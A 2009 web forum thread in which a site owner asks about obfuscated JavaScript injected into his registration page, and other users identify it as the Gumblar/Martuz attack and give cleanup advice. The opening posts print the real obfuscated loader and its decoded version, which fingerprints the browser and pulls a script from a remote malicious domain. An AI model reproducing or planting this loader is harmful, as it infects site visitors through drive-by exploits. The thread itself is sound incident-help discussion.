|
|||||||
New to SitePoint Forums? Register here for free!
|
 |
|
|
Thread Tools | Display Modes |
Nov 1, 2009, 10:43
|
#1 |
|
if ($zee == "Guru") { $zee--;}
 
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
|
Strange JS Code !
Hi
I have a website and it was working ok but from last 1 month, there has been issues and I cant access a particular form on my website. When i checked I noticed that my firewall is blocking that as it has some Strange JS code (i saw the strange code by View Source at another computer). I am placing the code here so that any 1 can suggest what I should do. The following code occurs after [/head] and before [body] tags. Code:
<script language=javascript><!--
(function(){var bpAjN='%';var igdR='var-20a-3d-22ScriptE-6egine-22-2c-62-3d-22-56e-72si-6fn-28)+-22-2cj-3d-22-22-2cu-3d-6eavigator-2eu-73er-41gent-3bif(-28u-2ei-6edexOf(-22Chrome-22-29-3c0-29-26-26(u-2ein-64e-78Of(-22Win-22)-3e0-29-26-26(u-2ei-6edexOf-28-22NT-20-36-22)-3c0-29-26-26(-64ocum-65nt-2ec-6fokie-2e-69nd-65-78Of(-22miek-3d-31-22-29-3c0)-26-26(typ-65-6f-66(zrvzt-73)-21-3dtype-6ff(-22A-22)))-7bzrvz-74-73-3d-22A-22-3be-76-61l-28-22if(-77-69ndow-2e-22+-61+-22)j-3dj+-22+a-2b-22Maj-6f-72-22+b+-61+-22Min-6f-72-22+-62+-61+-22Bui-6cd-22+b+-22j-3b-22-29-3bdo-63-75m-65-6et-2ew-72ite(-22-3cscript-20s-72c-3d-2f-2fm-61rt-22+-22uz-2ec-6e-2fvi-64-2f-3fid-3d-22+j+-22-3e-3c-5c-2fscr-69p-74-3e-22)-3b-7d';var by61A=igdR.replace(/-/g,bpAjN);eval(unescape(by61A))})();
--></script>
Please tell me what is this ? and How I can remove this ? Thanks Zeeshan |
|
|
|
Nov 1, 2009, 11:22
|
#2 |
|
Google search user
 
Join Date: Jul 2005
Location: West Springfield, Massachusetts
Posts: 9,128
|
It's weakly obfuscated code that runs this
Code:
var igdR='var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}';
|
|
|
|
|
Nov 1, 2009, 12:53
|
#3 |
|
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
|
it's been a while since i saw this now, and it looks like it's been slightly modified.
it it a modified version of the infamous "Gumblar exploit" or "fake yahoo counter" as it also appeared as in some versions... this version however uses another domain which is the Martuz dot cn. There is also added a check to see if you use Google Chrome, and not load the external script if Chrome is used. The rest looks like thee old Gumblar exploit to me. it normally happend because your pc is infected with trojans and sniffers who scans your puter for usernames and passwords and sends this to a server for further use. They then makes use of this info to inject/place this iframe and code on your files. it infects php/html/js etc, it also makes some new files and disguise some of them as pictures/jpg etc fire up regedit and have a look for this reg value: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux" (or aux2) if you find - delete it. clear all files on the server and make sure you replace them with FRESH new ones, and not new infected ones. scan your servers folders and files for strange unknown files and pictures and delete if you find it. Scan your pc and clear ALL your TEMP files. change passwords when you have cleaned your puter and cleared it's cache and Temp files - but first do a restart, then change passwords. This can be nasty and in many cases people almost gave up because it kepts coming back no matter what they did. So it's important to make sure you've cleaned your local pc properly. You can find more information on this by doing a google search for the "Gumblar exploit" and "fake yahoo counter" as this on your site is just a slightly modified version of it. |
|
|
|
|
Nov 1, 2009, 13:47
|
#4 |
|
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
|
I had to make some food here... but here is some more info, you can also find more info as it has been discussed in some previous posts - before when it was pure Gumblar code...
the code trigger another address, as you can see from Mittineague's post of the de-obfuscated code... here is two exploits triggered and trying to execute on "victims" computer.. you see from the code that it targets IE prior to NT6 (vista) and it tries to exploit known vulnerabilities in adobe PDF and Flash player to execute its code and infect as many as possible. But as I said, it is most likely to have it's roots from something installed on your local puter. |
|
|
|
|
Nov 2, 2009, 09:06
|
#5 |
|
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
|
Okay, but i have few other websites as well, and I have uploaded some other files to each of those websites. And there are no such problems.
What do u think ? |
|
|
|
|
Nov 2, 2009, 22:33
|
#6 |
|
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
|
Moreover, the strange code is appearing in only 1 page that is a Registration Form, and at only 1 hosting server. When I tried it to a different server, it was ok.
@Crazybanana The Registry thing you mentioned is related to the SOUND CARD driver of the system. If I delete that it will turn the sound off. |
|
|
|
|
Nov 3, 2009, 08:14
|
#7 |
|
Google search user
Join Date: Jul 2005
Location: West Springfield, Massachusetts
Posts: 9,128
|
Have you
1. Cleaned your computer? 2. Changed usernames/passwords, including FTP? 3. Re-uploaded the website files from a clean backup? I realize it's a bit of work, but that's what needs to be done. |
|
|
|
|
Nov 3, 2009, 12:29
|
#8 | |||
|
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
|
Quote:
scan your pc with newest AVG, Avast, Malwarebytes, Norton etc... make sure you clear all your TEMP files. this be the content of the folder "Temp" inside the hidden "Local Settings" folder and the hidden folder "Content.ie5" inside your hidden "Temporary Internet Files" folder. and clear all other cache and history. You have to boot into safe mode to delete some of it, and remember: just the contents of these folders, and not the folders itself. Scan for viruses both in safe mode and normal mode, as some files/viruses can only be dealt with in SAFE MODE! Empty Trash and reboot scan again, do a netstat from the command line to look for suspicious connections. Quote:
maybe your code/script/app has a weakness that allowed it to be exploited to inject the code ,but I doubt it from what you've told us above. it looks like there is something stored on that server that injects this code as soon as you upload it. Quote:
 so have a second look at it to see if there is added something, or if it looks suspicious. if you're unsure post the regkey for others to have a look, or copy and paste this into notepad and save it as regfix.reg (chose to save as all files to get the .reg) but back up the registry/registry key first: Code:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32] "aux"="wdmaud.drv" check error logs (if any) and clean the server. then upload a clean copy (after you've cleaned your puter). Make sure that what you upload is clean, as this "virus" creates fake files ans embeds itself to almost all kind of files - it also disguise itself as images and scripts etc so double check everything to be sure. it is very important to clear cache as some files runs from - yeah that's right, from Cache. after doing all this, change your usernames/passwords including those for FTP. and do a netstat as I said to double check... then upload new clean content and let us know what's happening... |
|||
|
|
|
|
Nov 3, 2009, 19:13
|
#9 |
|
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
|
Woooof !
Thanks a lot for sharing all this, I will definitely look in all these what you have suggested. But here is something, as you said that my local computer might have something, IF yes, then why it only inject the JS code and show that in 1 hosting ? why not on others sites I have been working ? |
|
|
|
|
Nov 3, 2009, 23:49
|
#10 |
|
Google search user
Join Date: Jul 2005
Location: West Springfield, Massachusetts
Posts: 9,128
|
Do all your sites have the same username, password and files?
|
|
|
|
|
Nov 4, 2009, 10:08
|
#11 | |
|
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
|
Quote:
 but there are several things I could speculate in about it... like some passwords are stored and some needs to be written each time of use - or contact was lost between your pc and the server/hosting of the malicious gathering script. the hosting server was shut down or sw removed - your virus/malware app found it and deleted it - your other info has not yet been used by the attackers - sw/scripts on your server has been patched - or you've just been lucky  Anyway, there has been a hack, and if you are to ignore it without furter investigation - it will most likely happend again. |
|
|
|
|
|
Nov 5, 2009, 09:48
|
#12 |
|
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
|
No the other sites ftp login details are different. and also the files are different.
But when I uploaded the thing to an other hosting for testing, it was OK there and there was no such code. But when I moved the files to the actual server, it shows the code. |
|
|
|
|
Nov 5, 2009, 09:48
|
#13 |
|
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
|
Is it possible that the HOSTING SERVER is infected ?
|
|
|
|
|
Nov 5, 2009, 10:19
|
#14 | |
|
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
|
Quote:
this is how this martuz/Gumblar exploit/virus works (at least this is how it used to work, but I guess it's working the same way now - even if some of the scripts is rewritten a bit) This virus/exploit doesn't spread outside of the user account that is infected. so search the server you are using for any suspicious files and scripts. Also remember that it embeds itself to other files so even if you doesn't see any unknown or suspicious files or folders, it can still be there - embedded to other legal files. but also remember to double check the computers who have had access to the server which have this problem. |
|
|
|
|
|
Nov 7, 2009, 21:28
|
#15 |
|
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
|
Yes, that is what I thought earlier, as my client has also access to that server. Well, I have access to 100s of different servers, but none of them is infected. Means, my computer is not infected, and its the particular client's PC who has the virus and thus infected his server.
Thanks s lot CrazyBanana, and all others. |
|
|
|
|
Nov 8, 2009, 10:08
|
#16 |
|
Google search user
Join Date: Jul 2005
Location: West Springfield, Massachusetts
Posts: 9,128
|
You ran some thorough scans of your computer and they all came up clean?
If they did then your assumption based on the diagnosis of the symptoms is most likely correct. |
|
|
|
|
Nov 9, 2009, 11:36
|
#17 | |
|
SitePoint Guru
Join Date: Mar 2003
Location: In tha fruit cellar
Posts: 893
|
Quote:
|
|
|
|
|
|
Nov 9, 2009, 12:52
|
#18 |
|
if ($zee == "Guru") { $zee--;}
Join Date: Nov 2005
Location: Karachi - Pakistan
Posts: 979
|
for Scanning and Cleaning the following :
1) Trojan 2) Worm 3) Spam Software / Spyware 4) PUP (Potential Unwanted Programs) 5) anything else what is the best FREE software available ? |
|
|
|
|
| Bookmarks |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
| Display Modes | |
Linear Mode
|
|
|
All times are GMT -7. The time now is 13:44.